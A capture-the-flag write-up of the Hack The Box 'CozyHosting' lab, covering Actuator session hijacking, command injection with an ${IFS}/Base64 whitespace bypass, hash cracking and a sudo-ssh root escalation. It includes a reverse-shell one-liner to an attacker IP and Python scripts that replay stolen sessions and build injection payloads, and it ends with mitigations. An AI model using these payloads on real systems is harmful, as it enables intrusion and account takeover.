CozyHosting

Platform: Hack The Box

Category/Tags: Linux, Command Injection, Misconfiguration

Difficulty: Easy

Recon

To start the lab, just connect to the VPN provided by HTB and add the machine’s IP address to /etc/hosts.

As usual, I do an nmap scan.

nmap results
  • Open ports

    • Port 80 - http

    • Port 22 - ssh

Port 80 serves the landing page of a hosting company. There is also a login page; I tried some default and common credentials and some basic SQL injection payloads, but no luck.

landing page
login page

I did some directory fuzzing with ffuf. Several paths came back with status codes 401 (Unauthorized), 204 (No Content) and 500 (Internal Server Error), which is a sign that a framework is routing these requests rather than a static web root. To get a second opinion on the wordlist, I also ran dirsearch.

Among the results, the Spring Boot Actuator endpoints caught my attention, especially /actuator/sessions.


Actuator endpoints let you monitor and interact with your application. Spring Boot includes a number of built-in endpoints and lets you add your own. For example, the health endpoint provides basic application health information. From the Spring Boot documentation. Out of the box, Spring Boot only exposes health over HTTP; making sessions (or env, heapdump, mappings) reachable without authentication is a configuration choice, and that misconfiguration is what this box is built around.

actuator endpoints

Visiting http://<MACHINE_IP>/actuator/sessions lists the active HTTP sessions, including the session ID of the user kanderson. Because the JSESSIONID cookie is the only thing tying a browser to a server-side session, that ID is as good as a password.

auth token

Go to Inspect > Storage > Cookies and set the value of JSESSIONID to the session ID (a random-looking string) we saw earlier, then reload. Gotcha: we have access to the dashboard as K. Anderson without ever knowing a password.

admin dashboard
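The session hijack above can be scripted, which is also a quick way to check whether an Actuator sessions endpoint is leaking anything on a target. The following is an added example (not code from the original writeup): it parses a sessions response into a user-to-session-ID map and replays a session ID as the JSESSIONID cookie against a protected path. The sample JSON bodies are constructed; handling both the shape of Spring Boot's built-in SessionsEndpoint and a flat session-ID-to-user map is an assumption about what a given target emits, and the default protected path /admin is assumed rather than taken from the page.

```python
import json
import re
import sys
import urllib.error
import urllib.request

# Constructed sample bodies (not captured from the box). Spring Boot's built-in
# SessionsEndpoint returns {"sessions": [{"id": ..., "principalName": ...}]};
# some custom endpoints return a flat {"<session id>": "<user>"} map instead.
# Handling both shapes is an assumption about what a given target emits.
SAMPLE_SPRING_SHAPE = json.dumps({
    "sessions": [
        {"id": "0123456789ABCDEF0123456789ABCDEF",
         "principalName": "kanderson",
         "attributeNames": ["SPRING_SECURITY_CONTEXT"]},
    ]
})
SAMPLE_FLAT_SHAPE = json.dumps({"FEDCBA9876543210FEDCBA9876543210": "kanderson"})

# Tomcat session IDs are 32 upper-case hex characters.
SESSION_ID_RE = re.compile(r"^[0-9A-F]{32}$")


def extract_sessions(body: str) -> dict:
    """Map principal name -> session ID from either response shape."""
    data = json.loads(body)
    found = {}
    if isinstance(data, dict) and isinstance(data.get("sessions"), list):
        for entry in data["sessions"]:
            user, sid = entry.get("principalName"), entry.get("id")
            if user and sid:
                found[user] = sid
    elif isinstance(data, dict):
        for key, value in data.items():
            if SESSION_ID_RE.match(key) and isinstance(value, str):
                found[value] = key
    return found


def cookie_header(session_id: str) -> str:
    """The cookie is the only thing binding a browser to a server-side session."""
    return f"JSESSIONID={session_id}"


def fetch(url: str, session_id: str = None):
    """GET url, optionally replaying a hijacked session ID. Returns (status, body)."""
    headers = {"Cookie": cookie_header(session_id)} if session_id else {}
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: sessions_hijack.py http://<MACHINE_IP> [/protected-path]")
    base = sys.argv[1].rstrip("/")
    protected = sys.argv[2] if len(sys.argv) > 2 else "/admin"  # assumed dashboard path
    status, body = fetch(base + "/actuator/sessions")
    print(f"GET /actuator/sessions -> {status}")
    for user, sid in extract_sessions(body).items():
        code, _ = fetch(base + protected, sid)
        print(f"{user}: {sid} -> {protected} returns {code}")
```

A 200 on the protected path with a replayed ID (where an unauthenticated request gets a 302 or 401) confirms the leak is exploitable, not just an information disclosure.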

Foothold

I explored the dashboard. None of the components work except the connection settings form, which takes a hostname and a username, so it presumably opens an SSH connection to a remote host on our behalf. I tried a few hostname and username combinations, but kept getting this error:

ssh connection error

So I tried injecting Linux commands to see how the web app reacted to the input. I opened Burp Suite, intercepted the request made by the SSH connection feature, and tried a few shell metacharacters and commands in the username field. Luckily, it is vulnerable to command injection.


Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. From OWASP.

burpsuite request and response

We can now try for a shell. First, set up a listener on the attacking machine:

But I ran into a problem: any username containing a space is rejected with the error Username can't contain whitespaces! before anything is executed, so a normal reverse-shell one-liner never reaches the shell.

burpsuite response

After some research, the way around it is to Base64-encode the payload, so the command itself contains no spaces, and to use ${IFS} in place of the spaces that the decoding command needs.


Internal Field Separator (IFS), determines how Bash recognizes word boundaries while splitting a sequence of character strings. The default value of IFS is a three-character string comprising a space, tab, and newline. From Baeldung Linux. The point for us is ordering: the filter inspects the raw request value, which contains the literal text ${IFS} and no whitespace, and only afterwards does the shell expand ${IFS} into the whitespace that splits the words of our command.

Now, this is the crafted payload to be supplied in the username parameter. The Base64 string is the encoded form of the reverse-shell one-liner sh -i >& /dev/tcp/<YOUR_IP>/1234 0>&1; the injected command decodes it with base64 and pipes the result into bash. It has to be bash rather than sh on the receiving end, because /dev/tcp and the >& redirection are bash features.
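To make the bypass concrete, here is an added example (not the writeup's own payload or code) that builds the whitespace-free wrapper around an arbitrary command, checks it against a reconstruction of the server's filter, and decodes it back to confirm nothing was lost. The filter is assumed to be a plain whitespace test, since only the error text is known from the page; the command the box really runs behind the form is not shown, so the local demo substitutes a harmless echo. The placeholder IP is the writeup's.

```python
import base64
import re
import subprocess

REVERSE_SHELL = "sh -i >& /dev/tcp/<YOUR_IP>/1234 0>&1"  # placeholder IP from the writeup


def username_filter(username: str) -> str:
    """Mimics the server-side check behind the observed error message.
    Assumption: it is a plain whitespace test; only the message is known."""
    if any(ch.isspace() for ch in username):
        raise ValueError("Username can't contain whitespaces!")
    return username


def build_payload(command: str, interpreter: str = "bash") -> str:
    """Wrap COMMAND so the injected string contains no whitespace at all.

    base64's alphabet has no spaces, so the command is safe once encoded;
    the decoding pipeline uses ${IFS} wherever a space would normally go.
    The shell expands ${IFS} into whitespace only after the filter has run.
    """
    encoded = base64.b64encode(command.encode()).decode()
    return (f";echo${{IFS}}{encoded}${{IFS}}|${{IFS}}base64${{IFS}}-d"
            f"${{IFS}}|${{IFS}}{interpreter};")


def decode_payload(payload: str) -> str:
    """Recover the wrapped command, to sanity-check a payload before sending it."""
    match = re.search(r"echo\$\{IFS\}([A-Za-z0-9+/=]+)", payload)
    if not match:
        raise ValueError("no base64 blob found in payload")
    return base64.b64decode(match.group(1)).decode()


def simulate_server(host: str, username: str) -> str:
    """Stand-in for the vulnerable handler: denylist check, then string
    concatenation into a line run through sh -c. The box's real command is
    not shown on the page, so an echo keeps this demo harmless."""
    username_filter(username)
    line = f"echo connecting to {username}@{host}"
    result = subprocess.run(["/bin/sh", "-c", line], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    payload = build_payload(REVERSE_SHELL)
    print("payload:   ", payload)
    print("decodes to:", decode_payload(payload))
    # Harmless local demo: inject a command that reports who ran it.
    print(simulate_server("localhost", build_payload('echo "injected as $(id -un)"')))
```

The trailing @host left over from the original command line becomes a separate, failing shell command; that error is harmless because the injected pipeline has already run by then.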

Here it is: we get a shell, running as the user app.

app shell

But app is the service account the web application runs as, not the low-privileged user whose home directory we see under /home.

/home

In the current directory I found the application's jar file. I copied it to my local machine and opened it in a Java decompiler. A jar is just a zip archive, so the packaged resources are readable without decompiling anything; what caught my attention was the PostgreSQL credentials sitting in plaintext in classes/application.properties.

application.properties
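Pulling secrets out of a packaged jar is worth automating, because application.properties is rarely the only configuration file and the same jar also tells you how Actuator was configured. The following is an added example (not code from the writeup): it builds a tiny stand-in for a Spring Boot fat jar in memory with a constructed application.properties, scans every packaged config file for credential-looking keys, and reads back the Actuator exposure setting. The property keys follow Spring Boot's naming; the values are made up, not the box's.

```python
import io
import re
import zipfile

# Constructed application.properties standing in for the one in the real jar.
# Keys follow Spring Boot conventions; the values are invented for the demo.
SAMPLE_PROPERTIES = """\
server.port=8080
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=dbuser
spring.datasource.password=S3cretExample!
management.endpoints.web.exposure.include=health,beans,env,sessions
"""

SECRET_KEY_RE = re.compile(r"(password|passwd|secret|token|api[_-]?key)", re.I)
CONFIG_NAME_RE = re.compile(r"\.(properties|ya?ml|env|json|xml)$", re.I)
# key=value (properties) or key: value (yaml-ish), leading/trailing space tolerated
KV_RE = re.compile(r"^\s*([\w.\-\[\]]+)\s*[=:]\s*(.+?)\s*$")
EXPOSURE_KEY = "management.endpoints.web.exposure.include"


def build_sample_jar() -> bytes:
    """A Spring Boot fat jar is a zip; build a minimal one in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("BOOT-INF/classes/application.properties", SAMPLE_PROPERTIES)
        zf.writestr("BOOT-INF/classes/com/example/App.class", b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def scan_jar(jar_bytes: bytes) -> list:
    """Return (member, key, value) for credential-looking entries in packaged config files."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if not CONFIG_NAME_RE.search(name):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for line in text.splitlines():
                if line.lstrip().startswith("#"):
                    continue
                match = KV_RE.match(line)
                if match and SECRET_KEY_RE.search(match.group(1)):
                    hits.append((name, match.group(1), match.group(2)))
    return hits


def actuator_exposure(jar_bytes: bytes) -> list:
    """Actuator endpoints the packaged config exposes over HTTP.
    Empty means the key is unset, in which case Spring Boot exposes only health."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith("application.properties"):
                continue
            for line in zf.read(name).decode("utf-8", errors="replace").splitlines():
                match = KV_RE.match(line)
                if match and match.group(1) == EXPOSURE_KEY:
                    return [e.strip() for e in match.group(2).split(",")]
    return []


if __name__ == "__main__":
    import sys
    jar = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_jar()
    for member, key, value in scan_jar(jar):
        print(f"{member}: {key} = {value}")
    print("actuator exposure:", actuator_exposure(jar) or ["health (default)"])
```

Run it with a path to a real jar to scan that instead of the constructed sample. On a live engagement the exposure list is the first thing to read: a wildcard or anything beyond health there, combined with no authentication in front of /actuator, is exactly the condition that leaked the session above.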

With those credentials I connected to the cozyhosting database using the psql command,

The users table holds the password hash for admin, and from its format it looks like bcrypt.

users table

So, as usual, I crack it with John the Ripper. Bcrypt is a one-way hash, so this is offline guessing against a wordlist rather than decryption, and bcrypt's cost factor makes each guess slow; a weak password still falls quickly.

Gotcha! We have the password for admin.

john the ripper

The recovered password does not work for the admin account on the box itself, so the next guess is password reuse: try it for the other account under /home, josh.

We got the user shell!

user shell

Privilege Escalation

The privilege escalation on this machine is the easiest part.

I run sudo -l to see which commands josh is allowed to run through sudo, and as whom.

Based on the output, josh can run the ssh command as root via sudo.

sudo -l

So I headed to GTFOBins and looked up the sudo entry for ssh. The trick there abuses ssh's ProxyCommand option: ssh hands that option's value to a shell before any connection is attempted, so a user allowed to run ssh under sudo gets a root shell without ever reaching a remote host. This is why a sudo rule for any binary that can spawn a subprocess is effectively a rule for a root shell.

Luckily, I got the root shell.

root shell

Mitigation

  • Validate the hostname and username against a strict allowlist, and never build a shell command line from user input; invoke ssh with an argument vector so that shell metacharacters (and ${IFS}) are never interpreted. A denylist of whitespace is not a fix.

  • Don't expose Spring Boot Actuator endpoints such as sessions, env or heapdump over HTTP without authentication; limit management.endpoints.web.exposure.include to what monitoring actually needs.

  • Don't ship database credentials in plaintext inside the jar, and don't reuse the database admin password for a system account.

  • Don't give sudo rights to low-privileged users for binaries that can spawn a shell, such as ssh.
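As an added example of the first mitigation (not code from the writeup or from the box's application), the following places the exploited pattern next to a hardened one: a denylist-then-concatenate handler that the ${IFS} payload walks straight through, and an allowlist-then-argv version in which the same payload is rejected and, even if it were not, would never meet a shell. The ssh command line is assumed, since the page does not show the one the box runs; the allowlists forbid a leading "-" so that neither field can ever be parsed by ssh as an option.

```python
import re
import subprocess

# Strict allowlists. Username: POSIX-style login name. Hostname: RFC 1123
# labels. Both forbid a leading '-', so a value can never be parsed by ssh
# as an option such as -oProxyCommand=..., even when passed as argv.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$", re.I)


def vulnerable_command_line(host: str, username: str) -> str:
    """The pattern the writeup exploits: a denylist check, then string
    concatenation into a line meant for sh -c. (Assumed shape; the box's
    real command is not shown on the page.)"""
    if any(ch.isspace() for ch in username):
        raise ValueError("Username can't contain whitespaces!")
    return f"ssh -o ConnectTimeout=5 {username}@{host}"


def hardened_argv(host: str, username: str) -> list:
    """Allowlist both fields, then hand ssh an argument vector. With no shell
    involved, ';', '|', '$(...)' and ${IFS} are just bytes in a user name."""
    if not USERNAME_RE.match(username):
        raise ValueError("invalid username")
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname")
    return ["ssh", "-o", "ConnectTimeout=5", "-o", "BatchMode=yes",
            f"{username}@{host}"]


def connect(host: str, username: str) -> int:
    """Run the hardened form and return ssh's exit status. Never shell=True."""
    return subprocess.run(hardened_argv(host, username),
                          capture_output=True).returncode


if __name__ == "__main__":
    injected = ";echo${IFS}aWQ=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash;"  # wraps 'id'
    print("denylist lets it through:", vulnerable_command_line("10.10.10.1", injected))
    for user in ("kanderson", injected):
        try:
            print("hardened argv:", hardened_argv("10.10.10.1", user))
        except ValueError as err:
            print(f"rejected {user!r}: {err}")
```

The two defences are independent and both matter: the allowlist stops option injection (a username or host starting with "-"), and the argument vector stops shell injection even if a future change loosens the allowlist.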
